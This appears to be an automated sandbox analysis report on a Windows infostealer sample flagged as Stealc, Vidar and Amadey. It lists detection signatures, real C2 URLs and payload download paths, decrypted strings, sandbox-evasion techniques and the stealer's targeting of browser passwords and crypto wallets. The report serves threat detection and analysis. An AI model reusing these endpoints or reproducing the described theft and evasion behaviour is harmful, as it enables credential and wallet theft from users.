Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1466647
MD5: acd738c0840861a12f13acff7c6fd7e5
SHA1: 113b1470af40d3bd3a2af70f57390ba5d8b1162a
SHA256: dde34f614758e4d68e6732f7de0c9e210e6e8d56d65aae0f2cb1ee5d953d587c
Tags: exeStealc
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://77.91.77.81/mine/amadka.exe Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/Z Avira URL Cloud: Label: malware
Source: http://85.28.47.4/ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpB6 Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/920475a59bac849d.php% Avira URL Cloud: Label: malware
Source: http://85.28.47.4/EM32 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php5 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dlle Avira URL Cloud: Label: malware
Source: http://77.91.77.82/Hun4Ko/index.php/Hn Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll%U Avira URL Cloud: Label: malware
Source: http://77.91.77.81/mine/amadka.exe00 Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php Avira URL Cloud: Label: malware
Source: http://77.91.77.81/stealc/random.exe50673b5d7% Avira URL Cloud: Label: phishing
Source: http://77.91.77.81/stealc/random.exe Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exe00 Avira URL Cloud: Label: phishing
Source: http://77.91.77.82/Hun4Ko/index.php# Avira URL Cloud: Label: phishing
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dllP Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.php_ Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/msvcp140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.4 Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll_INF Avira URL Cloud: Label: malware
Source: http://85.28.47.4/. Avira URL Cloud: Label: malware
Source: http://85.28.47.4/845-40f1-ac21-573d1d5ce43f Avira URL Cloud: Label: malware
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dllY Avira URL Cloud: Label: malware
Source: http://85.28.47.4/920475a59bac849d.phpz Avira URL Cloud: Label: malware
Source: http://77.91.77.81/cost/go.exeAppData Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 0000000C.00000002.2396795251.0000000001BE5000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: 12.2.a62ee169b8.exe.900000.0.unpack Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.4/920475a59bac849d.php"}
Source: explorti.exe.1804.10.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php"]}
Multi AV Scanner detection for domain / URL
Source: http://85.28.47.4/ Virustotal: Detection: 17% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.phpM Virustotal: Detection: 22% Perma Link
Source: http://77.91.77.81/cost/go.exe Virustotal: Detection: 27% Perma Link
Source: http://77.91.77.81/mine/amadka.exe Virustotal: Detection: 27% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php% Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/softokn3.dll Virustotal: Detection: 6% Perma Link
Source: http://77.91.77.82/Hun4Ko/index.php Virustotal: Detection: 24% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php5 Virustotal: Detection: 10% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/mozglue.dll Virustotal: Detection: 7% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/nss3.dll Virustotal: Detection: 9% Perma Link
Source: http://77.91.77.81/mine/amadka.exe-Disposition: Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.81/mine/amadka.exe00 Virustotal: Detection: 25% Perma Link
Source: http://77.91.77.82/ Virustotal: Detection: 23% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll Virustotal: Detection: 7% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/freebl3.dll Virustotal: Detection: 6% Perma Link
Source: http://85.28.47.4/920475a59bac849d.php Virustotal: Detection: 23% Perma Link
Source: http://77.91.77.81/stealc/random.exe Virustotal: Detection: 27% Perma Link
Source: http://85.28.47.4/69934896f997d5bb/sqlite3.dll Virustotal: Detection: 24% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 55%
Source: file.exe Virustotal: Detection: 48% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000006001\a62ee169b8.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amadka[1].exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Sample uses string decryption to hide its real strings
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetProcAddress
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: LoadLibraryA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: lstrcatA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: OpenEventA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: CreateEventA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: CloseHandle
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: Sleep
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetUserDefaultLangID
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: VirtualAllocExNuma
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: VirtualFree
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetSystemInfo
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: VirtualAlloc
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: HeapAlloc
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetComputerNameA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: lstrcpyA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetProcessHeap
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetCurrentProcess
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: lstrlenA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: ExitProcess
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetSystemTime
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: SystemTimeToFileTime
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: advapi32.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: gdi32.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: user32.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: crypt32.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: ntdll.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetUserNameA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: CreateDCA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetDeviceCaps
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: ReleaseDC
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: CryptStringToBinaryA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: sscanf
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: VMwareVMware
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: HAL9TH
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: JohnDoe
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: DISPLAY
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: %hu/%hu/%hu
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: http://85.28.47.4
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: /920475a59bac849d.php
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: /69934896f997d5bb/
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: jony
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetFileAttributesA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GlobalLock
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: HeapFree
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetFileSize
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GlobalSize
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: IsWow64Process
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: Process32Next
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetLocalTime
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: FreeLibrary
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetTimeZoneInformation
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetSystemPowerStatus
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetVolumeInformationA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: Process32First
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetLocaleInfoA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetModuleFileNameA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: DeleteFileA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: FindNextFileA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: LocalFree
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: FindClose
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: LocalAlloc
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetFileSizeEx
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: ReadFile
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: SetFilePointer
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: WriteFile
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: CreateFileA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: FindFirstFileA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: CopyFileA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: VirtualProtect
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetLastError
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: lstrcpynA
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: MultiByteToWideChar
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GlobalFree
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: WideCharToMultiByte
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GlobalAlloc
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: OpenProcess
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: TerminateProcess
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: GetCurrentProcessId
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: gdiplus.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: ole32.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: bcrypt.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: wininet.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: shlwapi.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: shell32.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: psapi.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: rstrtmgr.dll
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: SelectObject
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: BitBlt
Source: 12.2.a62ee169b8.exe.900000.0.unpack String decryptor: DeleteObject
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C9C6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 0_2_6C9C6C80
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2311077148.000000006CBEF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2044243 ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in 192.168.2.6:49710 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2044244 ET TROJAN Win32/Stealc Requesting browsers Config from C2 192.168.2.6:49710 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051828 ET TROJAN Win32/Stealc Active C2 Responding with browsers Config M1 85.28.47.4:80 -> 192.168.2.6:49710
Source: Traffic Snort IDS: 2044246 ET TROJAN Win32/Stealc Requesting plugins Config from C2 192.168.2.6:49710 -> 85.28.47.4:80
Source: Traffic Snort IDS: 2051831 ET TROJAN Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 85.28.47.4:80 -> 192.168.2.6:49710
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor URLs: http://85.28.47.4/920475a59bac849d.php
Source: Malware configuration extractor IPs: 77.91.77.82
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 06:38:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 03 Jul 2024 06:38:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 